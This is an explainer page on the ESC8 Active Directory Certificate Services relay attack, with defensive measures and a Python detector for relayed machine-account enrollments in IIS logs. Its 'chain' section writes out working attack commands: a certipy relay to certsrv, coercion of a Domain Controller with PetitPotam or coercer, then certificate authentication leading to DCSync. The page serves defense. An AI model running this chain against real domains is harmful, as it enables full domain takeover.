Active Directory · Term

What is ESC8?

ESC8 relays a coerced machine authentication, often a Domain Controller, to the certificate authority’s web enrollment page, yielding a certificate for that machine and a path to full domain compromise. Here is what ESC8 is, the chain, and how to shut it down.

TL;DR

ESC8 is an AD CS attack that combines NTLM relay with the CA’s HTTP web enrollment endpoint (certsrv). The attacker coerces a privileged machine, often a Domain Controller, to authenticate to them, then relays that authentication to the web enrollment page to request a certificate as that machine. A Domain Controller certificate leads straight to DCSync and full compromise. It chains a coercion trick (PetitPotam, Coercer) with relay, and the fix is disabling NTLM and enforcing HTTPS with channel binding on enrollment.

By John Dill, Red Team Lead, SecureLayer7

What ESC8 is

AD CS can expose a web enrollment interface over HTTP (the certsrv application). By default it accepts NTLM authentication, and NTLM is relayable.

ESC8 abuses this: the attacker stands up an NTLM relay aimed at the web enrollment URL, then forces a target machine to authenticate to them using a coercion technique. They relay that authentication to the CA and request a certificate in the victim machine’s name. If the victim is a Domain Controller, the resulting certificate authenticates as the DC, which is game over.

The chain and payload

ESC8 is a two-tool chain: relay plus coercion.

  • Start the relay at web enrollment: certipy relay -target http://CA-HOST/certsrv/certfnsh.asp -template DomainController
  • Coerce a Domain Controller to authenticate to the relay: PetitPotam.py <attacker-ip> <dc-ip> or coercer coerce -u user -p pass -t <dc> -l <attacker-ip>
  • The relay obtains a DC certificate; authenticate with it: certipy auth -pfx dc.pfx
  • Use the DC identity for DCSync.

Documented techniques shown for defensive recognition.

How to defend

  • Disable NTLM on the AD CS web enrollment endpoints, and prefer removing web enrollment entirely if unused.
  • Enforce HTTPS with Extended Protection for Authentication (channel binding) so relayed authentication is rejected.
  • Require SMB and LDAP signing and enable EPA across the environment to blunt relay broadly.
  • Patch and mitigate coercion vectors (PetitPotam and related) and restrict who can reach the CA web endpoint.
  • Monitor for machine-account certificate requests, especially for Domain Controllers.
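The last point can be made concrete. The following is an added example, not code from the original page or from SecureLayer7: it parses IIS W3C log lines from the CA host and flags certsrv requests where a machine account authenticates from an address other than its own, which is what a relayed coerced authentication looks like from the CA's side. The log excerpt, the account-to-IP map and all host names are constructed.

```python
# Added example (not from the original page): flag web-enrollment requests
# made with a machine account from an address that is not that machine's own.
# Log lines, the account-to-IP map and host names below are all constructed.
from dataclasses import dataclass
from typing import Dict, Iterator, List, Optional

# W3C IIS log excerpt (constructed) from the CA host; the #Fields: line names
# the columns the way IIS writes them.
SAMPLE_LOG = """\
#Software: Microsoft Internet Information Services 10.0
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) sc-status
2024-05-02 09:14:01 10.0.0.20 GET /certsrv/certrqus.asp - 80 CORP\\alice 10.0.0.50 Mozilla/5.0 200
2024-05-02 09:15:10 10.0.0.20 POST /certsrv/certfnsh.asp - 80 CORP\\DC01$ 10.0.0.99 Mozilla/5.0 200
2024-05-02 09:15:12 10.0.0.20 GET /certsrv/certnew.cer ReqID=42 80 CORP\\DC01$ 10.0.0.99 Mozilla/5.0 200
2024-05-02 09:20:00 10.0.0.20 POST /certsrv/certfnsh.asp - 80 CORP\\WS07$ 10.0.0.70 Mozilla/5.0 200
"""

# Machine account -> expected source IP (constructed; in practice built from
# DNS, DHCP or AD computer objects).
KNOWN_HOSTS: Dict[str, str] = {"CORP\\DC01$": "10.0.0.10", "CORP\\WS07$": "10.0.0.70"}


@dataclass
class Finding:
    time: str
    account: str
    client_ip: str
    expected_ip: Optional[str]  # None when the account is not in KNOWN_HOSTS


def parse_w3c(text: str) -> Iterator[Dict[str, str]]:
    """Yield one dict per data row, naming columns from the #Fields: header."""
    fields: List[str] = []
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
        elif line and not line.startswith("#"):
            yield dict(zip(fields, line.split()))


def find_relayed_enrollments(log_text: str, known_hosts: Dict[str, str]) -> List[Finding]:
    """Flag /certsrv/ requests where a machine account ($) arrives from an IP
    other than the one recorded for it. Unknown machine accounts are flagged
    too (expected_ip=None), since they still warrant a look."""
    findings: List[Finding] = []
    for row in parse_w3c(log_text):
        user = row.get("cs-username", "-")
        if not row["cs-uri-stem"].lower().startswith("/certsrv/") or not user.endswith("$"):
            continue
        expected = known_hosts.get(user)
        if expected != row["c-ip"]:
            findings.append(Finding(f'{row["date"]} {row["time"]}', user, row["c-ip"], expected))
    return findings
```

On the sample above only the two DC01$ requests from 10.0.0.99 are reported; the WS07$ request comes from its own address and is not.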
